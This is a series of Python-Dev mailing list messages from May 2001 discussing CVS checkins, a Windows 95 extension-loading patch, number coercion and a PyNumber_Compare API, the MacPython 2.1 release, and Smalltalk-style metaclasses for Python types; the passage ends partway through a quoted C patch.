From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 17:04:30 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.44584.300357.360209@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
 <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
 <15126.44584.300357.360209@beluga.mojam.com>
Message-ID: <15126.45534.417066.445852@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > Functionally, the checkin isn't a muff (it does have the change I intended),
 > but I was worried about the version number.  Should I have checked it in as
 > version 1.34.2.1 or 1.35?

  If the change should happen on the branch, leave it in.  If it's
also needed on the HEAD, check it in again there, and you're done.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From m.favas@per.dem.csiro.au  Thu May 31 23:41:13 2001
From: m.favas@per.dem.csiro.au (Mark Favas)
Date: Fri, 01 Jun 2001 06:41:13 +0800
Subject: [Python-Dev] One more dict trick
Message-ID: <3B16C889.C01905BD@per.dem.csiro.au>

Tried the patch (thanks, Tim!) - but I guess the things I'm running
aren't too sensitive to dict speed <grin>. I see a slight speed-up,
around 1-2%... Nice, elegant patch that should go places! Maybe the
bio-informatics people on c.l.py (Andrew Dalke?) would be interested in
trying it out?

-- 
Mark Favas  -   m.favas@per.dem.csiro.au
CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA


From MarkH at ActiveState.com  Tue May  1 02:42:19 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 1 May 2001 10:42:19 +1000
Subject: [Python-Dev] Importing extensions on Windows 95
In-Reply-To: <3AED7248.B7386B83@lemburg.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>

> Here's a stab at a patch. Could you review it and test it ? I
> don't have enough knowledge of win32 for this...

I think we can drop the getcwd call here completely.

I prefer the patch below.

Mark.

Index: dynload_win.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
retrieving revision 2.7
diff -u -r2.7 dynload_win.c
--- dynload_win.c	2000/10/05 10:54:45	2.7
+++ dynload_win.c	2001/05/01 00:36:40
@@ -163,24 +163,21 @@
 
 #ifdef MS_WIN32
 	{
-		HINSTANCE hDLL;
+		HINSTANCE hDLL = NULL;
 		char pathbuf[260];
-		if (strchr(pathname, '\\') == NULL &&
-		    strchr(pathname, '/') == NULL)
-		{
-			/* Prefix bare filename with ".\" */
-			char *p = pathbuf;
-			*p = '\0';
-			_getcwd(pathbuf, sizeof pathbuf);
-			if (*p != '\0' && p[1] == ':')
-				p += 2;
-			sprintf(p, ".\\%-.255s", pathname);
-			pathname = pathbuf;
-		}
-		/* Look for dependent DLLs in directory of pathname first */
-		/* XXX This call doesn't exist in Windows CE */
-		hDLL = LoadLibraryEx(pathname, NULL,
-				     LOAD_WITH_ALTERED_SEARCH_PATH);
+		LPTSTR dummy;
+		/* We use LoadLibraryEx so Windows looks for dependent DLLs 
+		    in directory of pathname first.  However, Windows95
+		    can sometimes not work correctly unless the absolute
+		    path is used.  If GetFullPathName() fails, the LoadLibrary
+		    will certainly fail too, so use its error code */
+		if (GetFullPathName(pathname,
+				    sizeof(pathbuf),
+				    pathbuf,
+				    &dummy))
+			/* XXX This call doesn't exist in Windows CE */
+			hDLL = LoadLibraryEx(pathname, NULL,
+					     LOAD_WITH_ALTERED_SEARCH_PATH);
 		if (hDLL==NULL){
 			char errBuf[256];
 			unsigned int errorCode;


From thomas at xs4all.net  Tue May  1 10:07:48 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Tue, 1 May 2001 10:07:48 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Python bltinmodule.c,2.198,2.199
In-Reply-To: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Sat, Apr 28, 2001 at 01:20:24AM -0700
References: <E14tPxo-0001LL-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010501100748.M16486@xs4all.nl>

On Sat, Apr 28, 2001 at 01:20:24AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Python
> In directory usw-pr-cvs1:/tmp/cvs-serv4629/python/dist/src/Python
> 
> Modified Files:
> 	bltinmodule.c 
> Log Message:
> Fix buglet reported on c.l.py:  map(fnc, file.xreadlines()) blows up.
> Also a 2.1 bugfix candidate (am I supposed to do something with those?).

No, not really. You can do me a favor by writing halfway decent checkin
messages (no complaints there) and keep your fingers off the 'fix
whitespace' button :) I keep a close eye on the checkins as they happen, and
save away those that might need to be checked into the 2.1.1 branch. I'll go
over them with a fine tooth comb when I'm approaching critical release mass
:)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Tue May  1 12:30:57 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 12:30:57 +0200
Subject: [Python-Dev] Importing extensions on Windows 95
References: <LCEPIIGDJPKCOIHOBJEPOEDIDLAA.MarkH@ActiveState.com>
Message-ID: <3AEE9061.32239814@lemburg.com>

Mark Hammond wrote:
> 
> > Here's a stab at a patch. Could you review it and test it ? I
> > don't have enough knowledge of win32 for this...
> 
> I think we can drop the getcwd call here completely.
>
> I prefer the patch below.

If this works as expected, please check in the patch. (Note that
I have not tested the patch I posted -- I've never used VC++ for
anything else than compiling C extensions and GMP.)
 
> Mark.
> 
> Index: dynload_win.c
> ===================================================================
> RCS file: /cvsroot/python/python/dist/src/Python/dynload_win.c,v
> retrieving revision 2.7
> diff -u -r2.7 dynload_win.c
> --- dynload_win.c       2000/10/05 10:54:45     2.7
> +++ dynload_win.c       2001/05/01 00:36:40
> @@ -163,24 +163,21 @@
> 
>  #ifdef MS_WIN32
>         {
> -               HINSTANCE hDLL;
> +               HINSTANCE hDLL = NULL;
>                 char pathbuf[260];
> -               if (strchr(pathname, '\\') == NULL &&
> -                   strchr(pathname, '/') == NULL)
> -               {
> -                       /* Prefix bare filename with ".\" */
> -                       char *p = pathbuf;
> -                       *p = '\0';
> -                       _getcwd(pathbuf, sizeof pathbuf);
> -                       if (*p != '\0' && p[1] == ':')
> -                               p += 2;
> -                       sprintf(p, ".\\%-.255s", pathname);
> -                       pathname = pathbuf;
> -               }
> -               /* Look for dependent DLLs in directory of pathname first */
> -               /* XXX This call doesn't exist in Windows CE */
> -               hDLL = LoadLibraryEx(pathname, NULL,
> -                                    LOAD_WITH_ALTERED_SEARCH_PATH);
> +               LPTSTR dummy;
> +               /* We use LoadLibraryEx so Windows looks for dependent DLLs
> +                   in directory of pathname first.  However, Windows95
> +                   can sometimes not work correctly unless the absolute
> +                   path is used.  If GetFullPathName() fails, the LoadLibrary
> +                   will certainly fail too, so use its error code */
> +               if (GetFullPathName(pathname,
> +                                   sizeof(pathbuf),
> +                                   pathbuf,
> +                                   &dummy))
> +                       /* XXX This call doesn't exist in Windows CE */
> +                       hDLL = LoadLibraryEx(pathname, NULL,
> +                                            LOAD_WITH_ALTERED_SEARCH_PATH);
>                 if (hDLL==NULL){
>                         char errBuf[256];
>                         unsigned int errorCode;

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Tue May  1 23:22:11 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Tue, 01 May 2001 23:22:11 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
Message-ID: <3AEF2903.79308F55@lemburg.com>

I just received a bug report for mx.Number which revealed a
probelm with the comparison code in Python 2.1. Looking at
the code it seems that one of my original coercion patches
did not make it into the core. I added a new API PyNumber_Compare()
knows about the new coercion mechanism and should be called for
numbers instead of trying coercion in PyObject_Compare().

Was this part of the coercion patch left out on purpose or
a simple oversight ? I hope the latter... 

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jack at oratrix.nl  Tue May  1 23:23:59 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Tue,  1 May 2001 23:23:59 +0200 (MET DST)
Subject: [Python-Dev] MacPython 2.1 released
Message-ID: <20010501212359.792FADDDF0@oratrix.oratrix.nl>

MacPython 2.1 is available for download. Get it via
http://www.cwi.nl/~jack/macpython.html .


Python is a high-level programming language that is suitable for
simple scripting tasks as well as writing large
applications. MacPython offers alot of Mac-specific extensions,
including access to all major MacOS Toolbox modules (QuickDraw,
QuickTime, AppleScript and many more), an Integrated Development
Environment (in Python!), frameworks for windowing applications,
unix-compatible cgi-scripting, image-manipulation libraries, numerical
libraries, tk-based machine independent windowing and lots more. It
also uniquely among Pythons allows you to create fully selfcontained
(and, hence, distributable) applications without needing a C compiler
or anything.

New in this version:
- A choice of Carbon or Classic runtime, so runs on anything between
  MacOS 8.1 and MacOS X
- Distutils support for easy installation of extension packages
- BBedit language plugin
- All the platform-independent Python 2.1 mods
- New version of Numeric
- Lots of bug fixes
- Choice of normal and active installer

Please send feedback on this release to pythonmac-sig at python.org,
where all the MacPythoneers hang out.

Enjoy,


--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From guido at digicool.com  Wed May  2 02:52:29 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 19:52:29 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
Message-ID: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>

Jim Althoff (a big commercial user of J[P]ython) sent me a summary of
how metaclasses work in Smalltalk.  He should know, since he invented
them! :-)  I include it below, with his permission.

While implementing more class-like behavior for built-in types in the
experimental descr-branch in the 2.2 CVS tree, I've noticed problems
caused by Python's collapsing of class attributes and instance
attributes.

For example, suppose d is a dictionary.  My experimental changes make
d.__class__ return DictType (from the types module).
(DictType.__class__ is TypeType, by the way.)  I also added special
methods.  For example, d.__repr__() now returns repr(d).  I am
preparing for subclassing of built-in types, so I will eventually be
able to derive a class MyDictType from DictType, as follows:

class MyDictType(DictType):
  ...

Now comes the fun part.  Suppose MyDictType wants to define its own
repr():

class MyDictType(DictType):
  def __repr__(self):
    return "MyDictType(%s)" % DictType.__repr__(self)

But, (surprise, surprise!), DictType itself also has a __repr__()
method: it returns the string "<type 'dictionary'>".

So the above code would fail: DictType.__repr__() returns
repr(DictType), and DictType.__repr__(self) raises an argument count
error.  The correct __repr__ method for dictionary objects can be
found as DictType.__dict__['__repr__'], but that looks hideous!

What to do?  Pragmatically, I can make DictType.__repr__ return
DictType.__dict__['__repr__'], and all will be well in this example.
But we have to tread carefully here: DictType.__class__ is TypeType,
but DictType.__dict__['__class__'] is a descriptor for the __class__
attribute on dictionary objects.

The best rule I can think of so far is that DictType.__dict__ gives
the *true* set of attribute descriptors for dictionary objects, and is
thus similar to Smalltalks's class.methodDict that Jim describes
below.  DictType.foo is a shortcut that can resolve to either
DictType.__dict__['foo'] or to an attribute (maybe a method) of
DictType described in TypeType.__dict__['foo'], whichever is defined.
If both are defined, I propose the following, clumsy but backwards
compatible rule: if DictType.__dict__['foo'] describes a method, it
wins.  Otherwise, TypeType.__dict__['foo'] wins.

Sigh.

--Guido van Rossum (home page: http://www.python.org/~guido/)

------------------------- Jim Althoff's message ---------------------------

Hi Guido,

I was reading the discussion on class methods in the python-dev archive and
noticed your question about how Smalltalk determines the difference between
instance methods and class methods.  I have some info on this which I can't
post to python-dev, not being a member; but I thought you might be
interested in it anyway.

It turns out that I am the one that devised metaclasses in Smalltalk-80.
(On the other hand, I haven't looked at any Smalltalk implementation code
in a long time so this is merely a description of how it all started.)

Basically (I think) Smalltalk doesn't have the ambiguity you mention for
instance methods versus class methods (as Python would) because Smalltalk
doesn't do method lookup the same as Python does.

To illustrate, suppose you have object.method()  (using Python-style
syntax)

The Smalltalk method lookup is as follows:
o find the class that object is an instance of  --  this resulting thing is
a "class object" (a first-class object, same as in Python)
o since class is a "class object" one of its fields will be a dict of
methods -- let's call it class.methodDict
o find method in class.methodDict
o if found, execute method on object
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow class.superClass)

I believe Python works roughly as follows (Just testing my own
understanding here -- correct me if I don't get it right):
o convert (conceptually at least) object.method() into object.
__class__.method(object)
o find a _function_ corresponding to method in object.__class__.__dict__
o if found, execute the found function (with object bound as the first arg
to function)
o if not, traverse the (multiple inheritance) superclass chain (depth
first)

I think the key difference is that Python treats object.method() the same
as it treats object.__class__.method(object).  Smalltalk doesn't do this.
In Smalltalk, object.__class__.method(object) would mean:
o consider object.__class__ to be an "object" like any other "object" in
Smalltalk (which it is)
o get the "class object" of object.__class__ , namely object.
__class__.class__
o find method in object.__class__.__class__.methodDict
o if found, execute the method on object.__class__
o if not, do the same thing traversing the (single inheritance) superclass
chain (follow object.__class__.__class__.superClass)

In other words, it exactly the same lookup mechanism.  So there is no
ambiguity.

To summarize, in Smalltalk:

o instance methods (for instances that are not "class objects") are
specified by:  instance.instanceMethod()

o class methods are specified by:  class.classMethod()

o both of these are just object.objectMethod() since classes are objects
and the method lookup mechanism is no different from that of any other kind
of object.

A concrete example:

If I have a class Date in Smalltalk and an instance of it referenced by
variable, d.  I would do:
o d.followingDate() for an instance method, and
o Date.currentDate() for a class method

I think this is a nice, conceptually simple model.   Things get
interesting, though, when you start to consider how the mechanism of class.
__class__  -- which is the thing that makes class methods no different than
instance methods  -- actually works.  And this leads to metaclasses in
Smalltalk.

Here's a rough sketch of how metaclasses work:

Standard principles of Smalltalk:
o everything is an object (first-class)
o every object is an instance of a class
o a class inherits (single-inheritance) from its superclass (except the
root class Object, which has no superclass)
o methods can be invoked on a object.  All such methods are defined as part
of the object's class definition (or a class going up the superclass chain)

Because of the first 2 principles above:
o every class is an object (because everything is an object)
o every class is, itself, an instance of some class (because every object
is an instance of a class)

Originally in Smalltalk-76,  there was one metaclass, Class. All classes
(class objects) were instances of Class.  Class was an instance of itself.
Class had methods defined for it just like all classes did.  In particular,
it had a method "new" -- this being the method that creates instances of
classes.  So suppose you had class Rectangle.  Rectangle is an instance of
Class (hence it is a class object).  If you wanted to create an instance of
Rectangle, you would do: myRect = Rectangle.new().   This would mean: "find
the 'new' method in the definition of Rectangle's class (Class) and invoke
it on Rectangle (which is a class object).  The result is a Rectangle
instance which is assigned to the variable myRect.  The Rectangle class
object held data (state -- same rules as any other kind of object) -- such
as number and name of fields its instances would have, a dictionary of
methods for its instances, etc.  So the "new" method in Class would have
access to all the info it needed to create a Rectangle instance (as opposed
to a Point instance, for example).

The limitation with this scheme was that all classes had to share exactly
the same methods, namely all the methods defined in Class.  The method
"new" was one of these methods along with lots of  "reflection-type"
methods for class creation, modification, and inspection.  But if you
wanted an "application-oriented" class method -- like Date.currentDate() --
you couldn't do that because then the method "currentDate" would be shared
amongst all class objects (instances of Class) and wouldn't make any sense
(e.g., Rectangle.currentDate()).

In Smalltalk-80 I added a more flexible mechanism which we called
metaclasses (we hadn't used that terminology previously for the single
Class although it was a "metaclass").  The thing that everyone in the
Smalltalk development team liked about the new metaclass mechanism at the
time was that it didn't require any new basic principles for Smalltalk.  It
was all done using the same basic principles of Smalltalk listed above.
The idea was to use subclassing to allow for different methods for
different instances of Class.  A "metaclass" simply became a subclass of
Class.  Each class object then ended up being a singleton instance
(although the "singleton-ness" was not mandatory) of a metaclass (i.e., a
subclass of Class).  So class objects were no longer _all_ instances of the
_same_ class (Class).  Each was an instance of a corresponding subclass of
Class -- that is to say, an instance of a metaclass.

The Smalltalk-80 class hierarchy looked like the following:
(This is actually a simplification.  The actually hierarchy has a little
more factoring and I changed the names for more clarity).

First a digression on some terminology:
o a class is an object that can be instantiated
o a metaclass is a class and one such that when it is instantiated, the
instanced is itself a class
o a plain-object is one that cannot be instantiated  (I'm just making this
term up).
o a plain-class is one that is a class but is not a metaclass  (making this
up, too).

In the list below, indentation indicates class hieararchy (superclass --
subclass)

plain-class
----------------
<none>
o Class
   o  Object                                                   isInstanceOf
o ObjectMetaClass                     isInstanceOf  MetaClass
        o Class                                                isInstanceOf
o ClassMetaClass                    isInstanceOf  MetaClass
            o MetaClass                                  isInstanceOf
o MetaClassMetaClass      isInstanceOf  MetaClass
        . . .
        o Rectangle                                        isInstanceOf
o RectangleMetaClass          isInstanceOf  MetaClass
            o SpecializedRectangle            isInstanceOf
o SpecializedRectangleMetaClass  isInstanceOf  MetaClass
All "metaclasses" are instances of MetaClass.  All "plain-classes" (those
that are not "metaclasses") are instances of a "metaclass".  Because of
this there are parallel class hierarchies between "plain-classes" and their
corresponding "metaclasses".  Note that MetaClass is a "plain-class" and
not a "metaclass".  Also note that MetaClass (being a "plain-class") is an
instance of its corresponding "metaclass" MetaClassMetaClass.  And
MetaClassMetaClass is an instance of MetaClass (because MetaClassMetaClass
_is_ a "metaclass").  The MetaClass / MetaClassMetaClass class/instance
relationship is circular.

An example.   If you want a Rectangle class you first make a metaclass for
it, RectangleMetaClass  -- actually, the system does this for you
automatically as part of the class creation method implementation (when you
define the class Rectangle, for example).  RectangleMetaClass is an
instance of MetaClass so all the methods defined in MetaClass are available
to it.  RectangleMetaClass can also define its own methods now  (because it
is a class) which would be invoked on any (typically one) instance of
RectangleMetaClass, which in this case is going to be class Rectangle.  You
then make your Rectangle class by making an instance of RectangleMetaClass
(conceptually doing:  Rectangle = RectangleMetaClass.new()  ).   Now you
can make instances of Rectangle, doing:  myRect = Rectangle.new() as
before.  This is not so different from the Smalltalk-76 mechanism.  The
main advantage is that you now have a specific class, RectangleMetaClass,
that can have methods specific to the class Rectangle (the instance of
RectangleMetaClass).  So you could define a method like
"newFromPointToPoint" for example and then do:  myRect =
Rectangle.newFromPointToPoint(point1,point2).  The meaning is the same as
always: take the variable "Rectangle", find out what it is pointing to.  It
is pointing to an instance of the RectangleMetaClass.  Find the method
"newFromPointToPoint" as part of the definition of RectangleMetaClass (it
being a class object).  Invoke this method on the Rectangle class object --
which then creates a Rectangle instance.  The same would go for the other
example: Date.currentDate().

So the bottom line is (I think) that the Smalltalk method lookup mechanism
doesn't have to resolve an ambiguity because all methods that get invoked
on an object always come from the object's definition class (or superclass)
and from no other place.

Hope this helps,

Jim


From guido at digicool.com  Wed May  2 03:29:28 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:29:28 -0500
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: Your message of "Tue, 01 May 2001 23:22:11 +0200."
             <3AEF2903.79308F55@lemburg.com> 
References: <3AEF2903.79308F55@lemburg.com> 
Message-ID: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>

> I just received a bug report for mx.Number which revealed a
> probelm with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API PyNumber_Compare()
> knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().
> 
> Was this part of the coercion patch left out on purpose or
> a simple oversight ? I hope the latter... 

Hard to say.  I don't think I paid very close attention to your patch;
Neil did, but I changed a lot of the code around coercions and
comparisons in order to implement rich comparisons.  So, several
things may have happened: Neil lost it; Neil decided against it; or I
ripped it out.

Can you elucidate me regarding the issues?  (If there's code, please
quote it or link to a specific patch.)  Since the concept of "number"
is ill-defined at best, when exactly should PyNumber_Compare() be
called?  What is it supposed to do?  Does it need a rich cousin?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas at python.ca  Wed May  2 02:42:15 2001
From: nas at python.ca (Neil Schemenauer)
Date: Tue, 1 May 2001 17:42:15 -0700
Subject: [Python-Dev] Coercion and comparison of numbers
In-Reply-To: <200105020129.UAA24690@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Tue, May 01, 2001 at 08:29:28PM -0500
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com>
Message-ID: <20010501174215.A9565@glacier.fnational.com>

[MAL]
> I just received a bug report for mx.Number which revealed a
> probelm with the comparison code in Python 2.1. Looking at
> the code it seems that one of my original coercion patches
> did not make it into the core. I added a new API PyNumber_Compare()
> knows about the new coercion mechanism and should be called for
> numbers instead of trying coercion in PyObject_Compare().

I remember the API.  I don't remember what happened to it.  Guido
might have dropped it or I might have taken it out thinking the
comparison issues would be sorted out by Guido.

Why is a new API needed?  Why can't PyObject_Compare() do the
right thing (ie. not coerce new style numbers)?

  Neil


From guido at digicool.com  Wed May  2 03:55:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 20:55:59 -0500
Subject: [Python-Dev] Slight wart in __all__
In-Reply-To: Your message of "Sun, 29 Apr 2001 12:14:43 +1000."
             <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com> 
References: <LCEPIIGDJPKCOIHOBJEPKEBEDLAA.MarkH@ActiveState.com> 
Message-ID: <200105020155.UAA25687@cj20424-a.reston1.va.home.com>

> Would it make sense to a explicitly raise a more meaningful exception here
> if __all__ doesnt contain strings?

Definitely.  Be my guest.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Wed May  2 03:22:47 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 13:22:47 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020052.TAA24315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz>

Guido:

> If both are defined, I propose the following, clumsy but backwards
> compatible rule: if DictType.__dict__['foo'] describes a method, it
> wins.  Otherwise, TypeType.__dict__['foo'] wins.

Yeek! I think that's far too confusing a rule. I suppose
it might do in the meantime, but we'd better have a long
term solution in mind before going too far down this
route.

Ultimately it seems like we'll have to introduce a separate
namespace for methods and default instance attributes,
say __classdict__. Then lookup of x.foo would look
first in x.__dict__, then x.__class__.__classdict__,
etc up the inheritance chain.

Then we'll have to resolve the ambiguity of the class.foo
syntax. The bravest way would be simply to change the syntax
for getting unbound methods.

The most common use for these seems to be for calling
inherited methods, so perhaps something like

   inherited MyBaseClass.foo(arg, ...)

which would be equivalent to

   getmethod(MyBaseClass, 'foo')(self, arg, ...)

where getmethod() is a new builtin like getattr()
except that it looks in the __classdict__, and 'self'
is really whatever the first argument of the containing
method was.

Now that we have __future__, would such a change be
contemplatable? Or is it too radical to even think
about?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Wed May  2 04:48:43 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 01 May 2001 21:48:43 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:22:47 +1200."
             <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> 
References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> 
Message-ID: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>

> Guido:
> 
> > If both are defined, I propose the following, clumsy but backwards
> > compatible rule: if DictType.__dict__['foo'] describes a method, it
> > wins.  Otherwise, TypeType.__dict__['foo'] wins.

Greg Ewing:

> Yeek! I think that's far too confusing a rule. I suppose
> it might do in the meantime, but we'd better have a long
> term solution in mind before going too far down this
> route.

I agree 100%.  I had to do something quick to be able to make progress
with my PEP 252 project, but it's a clear indication that there's a
problem!

> Ultimately it seems like we'll have to introduce a separate
> namespace for methods and default instance attributes,
> say __classdict__. Then lookup of x.foo would look
> first in x.__dict__, then x.__class__.__classdict__,
> etc up the inheritance chain.

Except that sometimes you really do want x.__class__.__classdict__ to
have priority (e.g. for "guarded" attributes).

> Then we'll have to resolve the ambiguity of the class.foo
> syntax. The bravest way would be simply to change the syntax
> for getting unbound methods.

Agreed again.

> The most common use for these seems to be for calling
> inherited methods, so perhaps something like
> 
>    inherited MyBaseClass.foo(arg, ...)
> 
> which would be equivalent to
> 
>    getmethod(MyBaseClass, 'foo')(self, arg, ...)
> 
> where getmethod() is a new builtin like getattr()
> except that it looks in the __classdict__, and 'self'
> is really whatever the first argument of the containing
> method was.

The second most common use is to reference class variables
(e.g. imagine a class that keeps counters of how many instances have
been created and deleted in C.initcount and C.delcount).  But these
should not have to change, since they really are class attributes.

> Now that we have __future__, would such a change be contemplatable?
> Or is it too radical to even think about?

If we can find a way to spell "super.method", we should be ready for
the future.  I can't think of something right off the bat
unfortunately.

But the issue of backwards compatibility is a big one here: the idioms
for calling base class methods and using class variables as defaults
for instance variables are so common that we will have to support
these for many future versions!  (Two things I am not looking forward
to: fixing all the Zope code that uses this, and telling the author of
Programming Python, 2nd. ed.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Wed May  2 04:48:20 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Wed, 02 May 2001 14:48:20 +1200 (NZST)
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: <200105020248.VAA30315@cj20424-a.reston1.va.home.com>
Message-ID: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz>

Guido:

> Except that sometimes you really do want x.__class__.__classdict__ to
> have priority (e.g. for "guarded" attributes).

What's a "guarded" attribute?

> But the issue of backwards compatibility is a big one here

I was thinking that, while this is still in the __future__,
the __dict__ attribute would be a pseudo-dict that, by
default, behaves like the union of the old __dict__ and
the __classdict__.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From mal at lemburg.com  Wed May  2 09:59:03 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 02 May 2001 09:59:03 +0200
Subject: [Python-Dev] Coercion and comparison of numbers
References: <3AEF2903.79308F55@lemburg.com> <200105020129.UAA24690@cj20424-a.reston1.va.home.com> <20010501174215.A9565@glacier.fnational.com>
Message-ID: <3AEFBE47.A847C5D2@lemburg.com>

Neil Schemenauer wrote:
> 
> [MAL]
> > I just received a bug report for mx.Number which revealed a
> > probelm with the comparison code in Python 2.1. Looking at
> > the code it seems that one of my original coercion patches
> > did not make it into the core. I added a new API PyNumber_Compare()
> > knows about the new coercion mechanism and should be called for
> > numbers instead of trying coercion in PyObject_Compare().
> 
> I remember the API.  I don't remember what happened to it.  Guido
> might have dropped it or I might have taken it out thinking the
> comparison issues would be sorted out by Guido.

Good; so there's a chance for getting it back in :-)
 
> Why is a new API needed?  Why can't PyObject_Compare() do the
> right thing (ie. not coerce new style numbers)?

I think the reason for implementing number compares as separate
API was to simply shift out code from PyObject_Compare() into
a new function, not so much motivated by some higher level need
to do number compares.

[Guido]
> > Was this part of the coercion patch left out on purpose or
> > a simple oversight ? I hope the latter... 
> 
> Hard to say.  I don't think I paid very close attention to your patch;
> Neil did, but I changed a lot of the code around coercions and
> comparisons in order to implement rich comparisons.  So, several
> things may have happened: Neil lost it; Neil decided against it; or I
> ripped it out.
> 
> Can you elucidate me regarding the issues?  (If there's code, please
> quote it or link to a specific patch.)  Since the concept of "number"
> is ill-defined at best, when exactly should PyNumber_Compare() be
> called?  What is it supposed to do?  Does it need a rich cousin?

The reasoning is simple: the coercion patches basically pass
control over coercion down to the APIs in question and thus provide
the type with more information to choose from.

This is currently implemented in 2.1 for all number methods,
but not for number comparisons which do have the same problems
with centralized coercion as e.g. __add__ or other binary
operators.

Here's part of the original patch:

--- Include/orig/abstract.h	Wed May 13 00:28:58 1998
+++ Include/abstract.h	Thu May 21 12:31:55 1998
@@ -447,11 +447,18 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 
 	 This function always succeeds.
 
        */
 
-     PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
+     PyObject *PyNumber_Compare Py_PROTO((PyObject *o1, PyObject *o2));
+
+       /*
+	 Returns the result of comparing o1 and o2, or null on failure.
+	 This is the equivalent of the Python expression: cmp(o1,o2).
+       */
+
+      PyObject *PyNumber_Add Py_PROTO((PyObject *o1, PyObject *o2));
 
        /*
 	 Returns the result of adding o1 and o2, or null on failure.
 	 This is the equivalent of the Python expression: o1+o2.
 
[...]

 }
 
+/* Emulate old method for comparing numeric types using coercion and
+   tp_compare. If coercion doesn't work, we use the type names as
+   comparison basis (like PyObject_Compare() does too). */
+
+static PyObject *
+_PyNumber_OldstyleCompare(PyObject *v, 
+			  PyObject *w)
+{
+    int err;
+
+    DPRINTF("_PyNumber_OldstyleCompare(%s at 0x%lx, %s at 0x%lx);\n",
+	    v->ob_type->tp_name,(long)v,
+	    w->ob_type->tp_name,(long)w);
+    err = PyNumber_CoerceEx(&v, &w);
+    if (err < 0)
+	    return NULL;
+    else if (err == 0 && v->ob_type->tp_compare) {
+	    int cmp;
+	    
+	    cmp = (*v->ob_type->tp_compare)(v, w);
+	    /* XXX Test for errors ? Looks like C types cannot raise
+	       exceptions in the compare slot... */
+	    Py_DECREF(v);
+	    Py_DECREF(w);
+	    DPRINTF(" compare slot returned: %i",cmp);
+	    return PyInt_FromLong(cmp);
+    }
+    DPRINTF(" using type names for comparison\n");
+    return PyInt_FromLong(strcmp(v->ob_type->tp_name, 
+				 w->ob_type->tp_name));
+}
+
+PyObject *
+PyNumber_Compare(v, w)
+	PyObject *v, *w;
+{
